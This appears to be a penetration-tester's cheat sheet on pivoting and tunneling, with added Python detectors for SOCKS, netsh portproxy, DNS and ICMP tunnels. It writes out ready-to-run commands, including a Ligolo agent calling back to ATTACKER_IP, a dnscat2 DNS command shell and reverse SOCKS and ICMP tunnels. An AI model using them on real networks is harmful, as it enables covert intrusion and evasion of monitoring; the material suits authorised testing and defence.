Pivoting & Tunneling
Pivoting is moving into other networks through a compromised host to reach further targets on different network segments. Tunneling is wrapping our traffic inside another protocol to obfuscate our actions and avoid detection.
SSH
client: where the ssh command is executed.
server: target of the ssh connection.

Local port forwarding: maps a local client port to a port on a target reachable by the server.
ssh -N -L <C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT> <S_USER>@<S_IP>
# -L can be repeated for multiple ports

Dynamic port forwarding: maps a local client port to the server as a SOCKS proxy, so packets passing through that port leave from the server.
ssh -N -D <C_PORT> <S_USER>@<S_IP>
vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <C_PORT>
sudo proxychains[4] <COMMAND> (e.g. nmap, msfconsole)

Remote port forwarding: maps a port on the server to a port on a target reachable by the client.
ssh -N -R <S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT> <S_USER>@<S_IP>

Remote dynamic port forwarding: maps a server port to the client as a SOCKS proxy, so packets passing through that port leave from the client.
ssh -N -R <S_PORT> <S_USER>@<S_IP>

-N: do not execute remote commands (forwarding only).
0.0.0.0: all interfaces.
Metasploit
Pivoting only inside Metasploit: adds routes to other subnets via Meterpreter sessions (through the victim hosts).
post/multi/manage/autoroute # set network and session
Or
route add <NETWORK> <SESSION>
Or, in Meterpreter:
run autoroute -s <NETWORK>

Pivoting for tools outside Metasploit: maps a local port to Metasploit as a SOCKS proxy, so packets passing through that port are handled by the routes defined in Metasploit.
# Set the route first (see above)
auxiliary/server/socks_proxy # set the SOCKS version (4a or 5) and PORT
vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <PORT>
sudo proxychains[4] <COMMAND> (e.g. nmap)
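Both the ssh -D proxy above and Metasploit's socks_proxy hand proxychains a plain SOCKS port. The Python below is an added example, not from the page, that decodes the destination carried in a SOCKS4, SOCKS4a and SOCKS5 CONNECT request; the sample requests and the hosts in them are constructed. It shows why the SOCKS port is where every proxied connection's real target is visible in the clear, to the pivot host and to anyone watching that port.

```python
import ipaddress
import struct

CMDS = {1: "CONNECT", 2: "BIND", 3: "UDP_ASSOCIATE"}

# Constructed sample requests (made-up hosts), shaped like what proxychains writes to the
# 127.0.0.1:<C_PORT> socket opened by ssh -D or socks_proxy.
SOCKS4_CONNECT = b"\x04\x01" + struct.pack("!H", 445) + bytes([10, 10, 10, 5]) + b"user\x00"
# SOCKS4a: destination IP 0.0.0.x announces that a hostname follows the userid.
SOCKS4A_CONNECT = (b"\x04\x01" + struct.pack("!H", 80) + b"\x00\x00\x00\x01"
                   + b"\x00" + b"intranet.example\x00")
# SOCKS5 request (sent after method negotiation), ATYP 3 = length-prefixed domain.
_NAME = b"dc01.corp.example"
SOCKS5_CONNECT = b"\x05\x01\x00\x03" + bytes([len(_NAME)]) + _NAME + struct.pack("!H", 389)


def parse_socks_request(data: bytes) -> dict:
    """Return {version, cmd, host, port} for a SOCKS4/4a/5 request (destination is in the clear)."""
    if len(data) < 2:
        raise ValueError("truncated request")
    version, cmd = data[0], data[1]
    if version == 4:
        if len(data) < 9:
            raise ValueError("truncated SOCKS4 request")
        port = struct.unpack("!H", data[2:4])[0]
        raw_ip = data[4:8]
        userid_end = data.index(b"\x00", 8)          # userid is NUL-terminated
        host, version_name = str(ipaddress.IPv4Address(raw_ip)), "socks4"
        if raw_ip[:3] == b"\x00\x00\x00" and raw_ip[3] != 0:
            host_end = data.index(b"\x00", userid_end + 1)
            host = data[userid_end + 1:host_end].decode("ascii")
            version_name = "socks4a"
        return {"version": version_name, "cmd": CMDS.get(cmd, cmd), "host": host, "port": port}
    if version == 5:
        if len(data) < 5 or data[2] != 0:
            raise ValueError("malformed SOCKS5 request")
        atyp = data[3]
        if atyp == 1:                                # IPv4, 4 bytes
            host, rest = str(ipaddress.IPv4Address(data[4:8])), data[8:]
        elif atyp == 3:                              # domain name, 1-byte length prefix
            n = data[4]
            host, rest = data[5:5 + n].decode("ascii"), data[5 + n:]
        elif atyp == 4:                              # IPv6, 16 bytes
            host, rest = str(ipaddress.IPv6Address(data[4:20])), data[20:]
        else:
            raise ValueError(f"unknown ATYP {atyp}")
        port = struct.unpack("!H", rest[:2])[0]
        return {"version": "socks5", "cmd": CMDS.get(cmd, cmd), "host": host, "port": port}
    raise ValueError(f"not a SOCKS request (version byte {version})")
```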
In Meterpreter you can define both Local and Remote port forwarding (see SSH above).
Local
portfwd add -l <C_PORT> -p <S_TARGET_PORT> -r <S_TARGET_IP>
Remote
portfwd add -R -l <C_TARGET_PORT> -p <S_PORT> -L <C_TARGET_IP>
Other
Simple Port Forwarding (single-host)
socat: define the listening port and the destination to rebroadcast to.
socat TCP4-LISTEN:<PORT>,fork TCP4:<TARGET_IP>:<TARGET_PORT>
netsh (Windows): define the listening port and the destination to rebroadcast to. Requires administrator privileges.
netsh.exe interface portproxy add v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0 connectport=<TARGET_PORT> connectaddress=<TARGET_IP>
To view:
netsh.exe interface portproxy show v4tov4

sshuttle
Lets you define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains.
sudo sshuttle -r <USER>@<IP>:<PORT_SSH> <NETWORK>
<COMMAND_TO_NETWORK>
# NO proxychains, but requires root on the SSH client and Python3 on the SSH server.
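Going back to the netsh portproxy rules in the Simple Port Forwarding section: the Python below is an added audit example, not from the page, that parses the output of netsh.exe interface portproxy show v4tov4 and flags rules that listen on every interface or relay traffic off-host, which is exactly the shape the add command above creates. The sample output is constructed; the column layout it assumes is the one netsh prints.

```python
import re

# Constructed sample of `netsh.exe interface portproxy show v4tov4` output (not
# captured from a real host); the column layout is the one netsh prints.
SAMPLE_NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8443        10.10.10.5      3389
127.0.0.1       5000        127.0.0.1       5001
0.0.0.0         3390        127.0.0.1       3389
"""

# One rule per line: listen address, listen port, connect address, connect port.
RULE_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")


def parse_portproxy(output: str) -> list:
    """Turn the netsh table into a list of rule dicts, skipping headers and separators."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line.strip())
        if not m:
            continue
        listen_addr, listen_port, connect_addr, connect_port = m.groups()
        rules.append({"listen_addr": listen_addr, "listen_port": int(listen_port),
                      "connect_addr": connect_addr, "connect_port": int(connect_port)})
    return rules


def suspicious_rules(rules: list) -> list:
    """Return (rule, reasons) pairs for rules worth a second look.

    A portproxy rule is the single-host pivot shown above: a listener on the host
    that relays to somewhere else. Listening on 0.0.0.0 exposes it to every network
    the host is on; a non-loopback connect address means the traffic leaves the host.
    Rules persist across reboots (stored in the registry under
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\PortProxy), so include them in
    persistence reviews.
    """
    flagged = []
    for rule in rules:
        reasons = []
        if rule["listen_addr"] == "0.0.0.0":
            reasons.append("listens on all interfaces")
        if not rule["connect_addr"].startswith("127."):
            reasons.append("forwards to another host")
        if reasons:
            flagged.append((rule, reasons))
    return flagged
```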
Plink
On Windows before OpenSSH, PuTTY and its command-line-only counterpart Plink were used. Plink has much of the functionality offered by ssh.
plink.exe -ssh -R <PORT>:<IP>:<PORT> <USER>@<IP>
plink.exe -ssh -D 9050 <USER>@<IP>
Download Proxifier, portable version (like proxychains but for Windows).
Set a new proxy server: SOCKS5, 127.0.0.1:9050
<COMMAND>
If we cannot interact with the running shell:
-pw # specify the password on the command line
cmd.exe /c echo y | plink.exe -ssh ... # answer the prompt via piping
Tunneling
Ligolo-ng
apt install ligolo-ng
Proxy on the attacker machine, agent on the victim machine.
On Attacker
sudo ./proxy -selfcert
# See ATTACKER_IP ATTACKER_PORT
# > help
Connect the victim to the server:
> sessions
> autoroute
Connect to the attacker server:
./agent.exe -connect <ATTACKER_IP>:<ATTACKER_PORT> -ignore-cert

PROXY --> AGENT1 --> AGENT2 --> ?
You can listen on ports on the agent and redirect connections to your control/proxy server.
listener_add --addr <AGENT_IP>:<AGENT_PORT> --to <PROXY_IP>:<PROXY_PORT> --tcp
> listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
Useful when we need to set up a reverse shell or something else from the second target (AGENT2) in the network that is not directly reachable.
If we want to pivot again from the second target machine (AGENT2), we just need to load the agent, reconnect to the proxy server via the configured listener, set up a new tun (e.g. ligolo2) and add routing (see above).
Because the agent runs without privileges, it is not possible to forward raw packets. When you perform an nmap SYN scan, a TCP connect() is performed on the agent instead.
When using nmap, use --unprivileged or -PE to avoid false positives.
Chisel
Performs TCP/UDP pivoting and tunneling, transported over HTTP and encrypted internally via SSH. Being hidden under HTTP it can bypass some restrictions.
On Attacker
chisel server -p <PORT> --reverse --socks5
On Target
chisel client <SERVER_IP:PORT> <REMOTE> [<REMOTE>]
<REMOTE> can take the forms:
<C_IP>:<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT>
R:<S_IP>:<S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT>
[R:]<PORT>:<PORT>
[R:]<PORT>:socks
Add the port in proxychains:
vim /etc/proxychains[4].conf
socks5 127.0.0.1 <PORT>
proxychains[4] <COMMAND>

dnscat2
DNS-based encrypted command-and-control channel. A dnscat2 server runs on an authoritative name server for a particular domain (or, as in our case, a dummy DNS server is created), while the client, configured to send its queries for that domain, runs on the compromised machine.
On Attacker (Server)
sudo apt install dnscat2
sudo dnscat2-server --dns host=<IP>,port=53,domain=<DOMAIN>
# Memorize the secret <SECRET>
On Target (Client)
Download the compiled client from HERE
./dnscat --dns server=<IP>,port=53,domain=<DOMAIN> --secret=<SECRET>
Or with the Windows PowerShell script:
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd
Once connected, from Attacker:
?
<COMMAND> --help
windows # see connection IDs
window -i <ID> # shell

ptunnel-ng
Communication channel encapsulated in ICMP packets. Requires administrator privileges.
Installation
.exe for Windows: HERE
git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng
sudo ./autogen.sh
cd src
On Target (Server)
sudo ./ptunnel-ng -r<SERVER_IP> -R22
On Attacker (Client)
sudo ./ptunnel-ng -p<SERVER_IP> -l2222 -r<SERVER_IP> -R22
ssh -p2222 -l<USER> <IP>
ssh -D 9050 -p2222 -l<USER> 127.0.0.1
vim /etc/proxychains[4].conf
# socks4 127.0.0.1 9050
sudo proxychains[4] <COMMAND>
sudo proxychains[4] nmap <TARGET_IP_FROM_SERVER>

SocksOverRDP
Allows tunnelling and pivoting between Windows systems via RDP. Requires administrator privileges.
On Attacker (Client), with System PowerShell
regsvr32.exe SocksOverRDP-Plugin.dll
mstsc.exe # Connect to target1
Download Proxifier, portable version (like proxychains but for Windows).
Set a new proxy server: SOCKS5, 127.0.0.1:1080
On Target1, with System PowerShell
SocksOverRDP-Server.exe
On Attacker
mstsc.exe # Connect to the next target via Target1 pivoting
Warning
With proxychains only the full TCP connect scan works (nmap -sT).
Windows Defender blocks ICMP, so the traditional ping does not work (nmap -Pn).
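For the dnscat2 DNS channel described above, an added detection example that is not part of the page: it scores each (client, domain) pair in a DNS query log on the traits a data-carrying tunnel shows, nearly all names unique, long names, high-entropy hex-like labels and data-carrying record types. The query log and the domain tunnel-example.net are constructed; the thresholds are assumptions to tune per environment.

```python
import math
from collections import defaultdict

# Constructed DNS query log as (client_ip, qname, qtype); not real traffic. The second
# client's names carry hex-encoded data in long labels, the shape a dnscat2 session
# produces under its configured domain.
SAMPLE_QUERIES = [
    ("10.0.0.7", "www.example.com", "A"),
    ("10.0.0.7", "mail.example.com", "A"),
    ("10.0.0.7", "www.example.com", "AAAA"),
    ("10.0.0.7", "cdn.example.com", "A"),
    ("10.0.0.9", "0123456789abcdef.fedcba9876543210.tunnel-example.net", "TXT"),
    ("10.0.0.9", "13579bdf02468ace.ace02468bdf13579.tunnel-example.net", "CNAME"),
    ("10.0.0.9", "fedcba9876543210.0123456789abcdef.tunnel-example.net", "MX"),
    ("10.0.0.9", "02468ace13579bdf.bdf13579ace02468.tunnel-example.net", "TXT"),
]

DATA_CARRYING_TYPES = {"TXT", "CNAME", "MX"}  # record types dnscat2 uses to carry data downstream


def shannon_entropy(s: str) -> float:
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def base_domain(qname: str) -> str:
    # Simplification: last two labels. Production code should use a public-suffix list.
    return ".".join(qname.rstrip(".").split(".")[-2:])


def score_dns_tunnels(queries, min_queries: int = 3) -> dict:
    """Score each (client, domain) pair 0..4 on tunnel indicators: nearly all names
    unique, long names, high-entropy prefixes, data-carrying record types."""
    groups = defaultdict(list)
    for client, qname, qtype in queries:
        groups[(client, base_domain(qname))].append((qname, qtype))
    scores = {}
    for key, items in groups.items():
        if len(items) < min_queries:
            continue
        names = [q for q, _ in items]
        prefixes = [q[: -len(key[1]) - 1] for q in names]   # strip ".<domain>"
        unique_ratio = len(set(names)) / len(names)
        avg_len = sum(map(len, names)) / len(names)
        avg_entropy = sum(map(shannon_entropy, prefixes)) / len(prefixes)
        data_ratio = sum(t in DATA_CARRYING_TYPES for _, t in items) / len(items)
        scores[key] = ((unique_ratio > 0.9) + (avg_len > 40)
                       + (avg_entropy > 3.5) + (data_ratio > 0.5))
    return scores
```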
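For the ptunnel-ng ICMP channel above, an added detection example that is not part of the page: it groups echo traffic per host pair and flags pairs whose payload sizes are larger or more varied than a stock ping produces, since a tunnel carries TCP segments of whatever size the wrapped connection needs. The records are constructed and the 64-byte ceiling is an assumption.

```python
from collections import defaultdict

# Constructed ICMP echo summaries as (src, dst, icmp_type, payload_len); not real
# traffic. Type 8 = echo request, 0 = echo reply. A stock ping carries a fixed, small
# payload (56 bytes on Linux, 32 on Windows), while a tunnel such as ptunnel-ng
# carries TCP segments whose sizes follow the wrapped connection.
SAMPLE_ICMP = [
    ("10.0.0.7", "192.0.2.1", 8, 56), ("192.0.2.1", "10.0.0.7", 0, 56),
    ("10.0.0.7", "192.0.2.1", 8, 56), ("192.0.2.1", "10.0.0.7", 0, 56),
    ("10.0.0.7", "192.0.2.1", 8, 56), ("192.0.2.1", "10.0.0.7", 0, 56),
    ("10.0.0.9", "203.0.113.5", 8, 1024), ("203.0.113.5", "10.0.0.9", 0, 1024),
    ("10.0.0.9", "203.0.113.5", 8, 317), ("203.0.113.5", "10.0.0.9", 0, 1024),
    ("10.0.0.9", "203.0.113.5", 8, 1024), ("203.0.113.5", "10.0.0.9", 0, 88),
    ("10.0.0.9", "203.0.113.5", 8, 64), ("203.0.113.5", "10.0.0.9", 0, 1024),
]


def icmp_tunnel_indicators(records, max_ping_payload: int = 64, min_requests: int = 3) -> dict:
    """Group echo traffic per host pair and return the pairs whose payloads look like
    carried data rather than ping: oversized or varying payload lengths."""
    pairs = defaultdict(lambda: {"requests": 0, "replies": 0, "sizes": set()})
    for src, dst, icmp_type, size in records:
        key = tuple(sorted((src, dst)))   # direction-agnostic host pair
        stats = pairs[key]
        if icmp_type == 8:
            stats["requests"] += 1
        elif icmp_type == 0:
            stats["replies"] += 1
        stats["sizes"].add(size)
    findings = {}
    for key, stats in pairs.items():
        if stats["requests"] < min_requests:
            continue                       # too little traffic to judge
        reasons = []
        if max(stats["sizes"]) > max_ping_payload:
            reasons.append(f"payload up to {max(stats['sizes'])} bytes")
        if len(stats["sizes"]) > 2:
            reasons.append(f"{len(stats['sizes'])} distinct payload sizes")
        if reasons:
            findings[key] = reasons
    return findings
```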